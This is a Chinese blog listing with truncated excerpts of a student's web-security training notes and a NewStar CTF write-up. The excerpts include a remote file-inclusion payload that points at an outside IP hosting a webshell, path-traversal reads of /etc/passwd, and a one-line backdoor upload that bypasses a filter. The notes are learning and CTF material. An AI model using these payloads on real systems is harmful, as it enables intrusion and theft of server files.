培训笔记2
实用技巧常用快捷键
复制粘贴剪贴撤回: Ctrl + c / v / x / z
移动代码块: Alt + 上下 或 鼠标拖动
快速复制: Alt + Shift + 上下
注释代码: Ctrl + /
缩进: Tab / Shift + Tab
删除单个单词: Ctrl + Backspace
切换窗口: Ctrl + Tab 应用内切换窗口 Alt + Tab 切换所有窗口 Win + Tab 切换应用
使用工具 & 软件
截图: Ctrl + Alt + A (QQ) / Win + Shift + S (系统)
录制: Win + G(系统) / OBS
笔记: Typora, Obsidian, 飞书云文档, Hexo搭建博客
视频课资源: MOOC,BiliBili
文件查找: everything
思维导图: Xmind
电脑防护: 火绒
博客 & 文档: 知乎,稀土掘金,Stack Overflow,Github,GPT
输入输出格式化输入输 ...
周记2-文件包含,XSS,文件上传
文件包含漏洞通过php函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。而主要就是php中include()函数:包含并运行指定文件。
通过远程代码生成webshell123<?php include $_GET['file'];?>
如果我自建一个111.230.199.201/test.txt这样的网站文件并在此写入木马,那么通过以下语句就能使目标网站运行我的恶意文件做到生成webshell
?file=http://111.230.199.201/test.txt
条件:allow_url_fopen、allow_url_include为on
任意文件读取如果是linux,可以以绝对路径查看?file=/etc/passwd等敏感文件或是查看相对路径?file=../../../etc/passwd等敏感文件
还可以加一些不存在的目录名,进行穿越、绕过,例如:?file=& ...
培训笔记1
笔记1数据类型不同的数据类型只区别于占据的内存空间,而不同的占据空间会影响在计算机内开辟的内存区域,作为计算机,通过读取不同内存部分的地址来使用数据
而数据类型,就如同服务员来敲开不同门牌号(地址)的房间(内存)来拿取数据,不同的数据类型也就对应着不同数量的服务员
对于不同的数据传输,计算机和计算机,计算机和人之间如何”交流”,是通过人为规定的编码与数据对应的表来进行数据传输,从最早的ASCII表到如今的utf-8编码,一切存在世界上的文字与字符甚至表情、语言或是图片,都有对应规定的计算机编码格式,从而转换为二进制使计算机进行存储或传输数据
计算机网络基础
类似于商家,快递公司,快递员,小区,买家,小区的围栏可代表小区的容量,商家包快递和买家拆快递是种逆过程
细分:
快递气柱&包装:顶层协议封装
快递面单:底层协议封装
快递员:互联网
小区:局域网(可浅理解计算机自带围栏)
小区大门&保安闸机:路由器/网关&访问策略(可浅理解为规则,eg:新疆不发)
小区围栏:防火墙(可浅理解阻止从内到外或者从外到内)
小区容量:子网掩码
单元号:IP ...
周记1-MD5,初级绕过,Liunx基本,php反序列化
MD5碰撞例如:
12$password=md5($_POST['password']);substr($password,0,6)==="c4d038";
对于这样的问题,传入的password值为多少才能使代码成立呢这种就可以考虑写一个简单的Python脚本来实现md5弱碰撞(因为md5不可反向解码,实际是需要一个个试出来答案的),可以先从数字试起
123456789import hashlibdef crack(pre): for i in range(0, 999999): if (hashlib.md5(str(i).encode("UTF-8")).hexdigest())[0:6] == str(pre): print(i) breakcrack("c4d038")
运行后发现得出结果为114514
php的一些初级绕过md5弱类型绕过1$a != $b && md5($a) == md5($b)
例如对于这样的a ...
NewStar CTF web1
泄露的秘密根据题目和网页的提示,认定这是一道藏有敏感文件的题,第一时间我想到的是爆破路径,但是很不巧,我没安dirseach,自己的路径扫描工具还出了问题..我就打算尝试几个可能藏有敏感文件的路径,发现/robots.txt里有一部分flag好,但是只出来了这一半,果不其然的卡关了,但是在刚才的尝试中发现了一个/index.php路径有点特殊,据我发现网页是存在这个路径的但是显示不出来这个文件,所以通过网上的搜索,终于发现一种能下出敏感文件的路径/www.zip好好好还真藏在这里了,这下另一半flag也找到了,拼接一下提交这样就成功拿下第一道了
Begin of Upload经典文件上传,那么先尝试一句话木马直接上传上传后发现网页过滤格式,那么我采取改成合法后缀上传后抓包再改包的这种方法植入后门那么接下来改好后缀上传,直接用burpsuite抓取这个数据包此时上传就成功了,也从burpsuite内抓到了数据包那么这时将这里的后缀改成php,再发回给服务器,这个木马就生效了好,这样就可以用webshell操作了,这里我用中国蚁剑操作一下ok确认植入成功了,我 ...
序言
序言这里是总结的一波web安全知识点,欢迎阅读
https://eihev6cyr3j.feishu.cn/wiki/O508wKnVfi1ixQkgZHJcGAaqnm9?fromScene=spaceOverview